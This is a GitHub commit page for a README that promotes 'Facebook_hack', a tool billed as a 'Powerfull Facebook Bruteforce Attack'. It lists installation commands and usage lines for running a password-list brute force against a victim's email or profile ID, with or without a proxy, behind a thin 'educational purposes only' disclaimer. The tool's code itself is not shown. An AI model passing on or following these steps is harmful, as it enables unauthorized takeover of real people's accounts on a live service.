Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
hackerxphantom authored Jun 8, 2022
1 parent 8d8675f commit 8b892d9
Showing 1 changed file with 60 additions and 1 deletion.
61 changes: 60 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1 +1,60 @@
# Facebook_hack
# Facebook_hack

This comment has been minimized.

Copy link
@Laraaldrine99

Laraaldrine99 May 16, 2023

Iverkazzy


![PicsArt_22-06-08_16-34-50-148](https://user-images.githubusercontent.com/70594016/172602116-20012d77-f4c2-45a6-a5fb-391f683c0f05.png)
###### Powerfull Facebook Bruteforce Attack.
***
### <p align="center">Commands to run tool in ur terminal Termux && Kali Linux
***

```bash
Note : Tool is Made of Educational Purposes only.
Please try not to harm anyone device
it's For Fun Purpose Not For Revenge
(Join Us https://bit.ly/3PV3S3r)
```
## Language is used to Make this tool
- Python
## The Tool is for :
- Windows
- Kali Linux
- Android~Termux
- macOs
- any Os has python(2.x, 3.x) with required modules
###### Installation
```bash
apt update && apt upgrade -y
```
```bash
apt install git -y
```
```bash
git clone https://github.com/hackerxphantom/Facebook_hack.git
```
```bash
cd Facebook_hack
```
```bash
pip install requirements.txt
```
```bash
python facebook_hack.py
```
## usage :-
- **U can Use Victim email Or Facebook Profile Id**:
- **Brute Force On Facebook Account Without proxy**:
* **Command**: python facebook_hack.py -t victim@gmail.com -w 10MPASS.txt
- **Brute Force On Facebook Account With Proxy**:
* **Command**: python facebook_hack.py -t victim@gmail.com -w 10MPASS.txt -p 144.217.101.245:3129
- **Get Target Facebook Profile ID**:
* **Command**: python facebook_hack.py -g https://www.facebook.com/zuck

1 comment on commit 8b892d9

@ff5040555
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

cd Facebook_hack

Please sign in to comment.